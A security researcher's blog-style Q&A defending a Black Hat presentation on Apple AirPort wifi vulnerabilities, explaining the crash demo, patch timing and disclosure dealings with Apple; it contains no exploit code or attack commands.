I will answer a couple of popular questions about my presentation. Other than this I feel Jon and I have proved we found vulnerabilities and attempted to work with Apple. This is now a dead subject for me. The presentation and code samples should be up on both our site (erratasec.com) and the Blackhat site soon.
I thought you said it was a hijack yet you only showed a DoS.
Yup, I showed a crash. I didn’t feel the need to do the do the entire hijack for two reasons: Apple already confirmed that this vulnerability leads to remote code execution (they said so in the advisory here). Everybody that was running a sniffer during my talk now has a copy of the DoS code. The demo had two parts. I showed the crash happening on a 10.4.6 machine since it didn't have any of the airport patches. I then rebooted into 10.4.8 and the crash no longer happened. I did this to prove that the Airport patches issued on Sept 21st, 2006 fixed the problem I was demoing. The only real change to airport code was the security fixes that were issued.
Why not just release everything?
You see the correspondence between my email address at my former employer and anybody is not my property. That correspondence owned by my former employer. Due to legal reasons I can’t just release them, and then I would be violating employment agreements. This is what got Mike Lynn into a lot of trouble.
You just reversed the patches and found what you then showed on stage.
I find this to be a funny argument. If I have the skills to reverse the patches and do a binary difference analysis of them, why couldn’t I use those same skills to find the bugs in the first place (they weren’t hard to find). This argument also doesn’t take into account the fact that I showed that the first crash of the exploit occurred on Jul 15th, 2006, or emails to Apple helping them build a wifi auditing box (A linux machine with madwifi patched with LORCON) and pointed them to a vulnerability that was fixed in their patches (a problem with overly long SSIDs). The picture below is from the day I bought the Macbook, July 15th 2006. This crash occurred because I was fuzzing other devices and the Macbook crashed before I got to run the initial setup.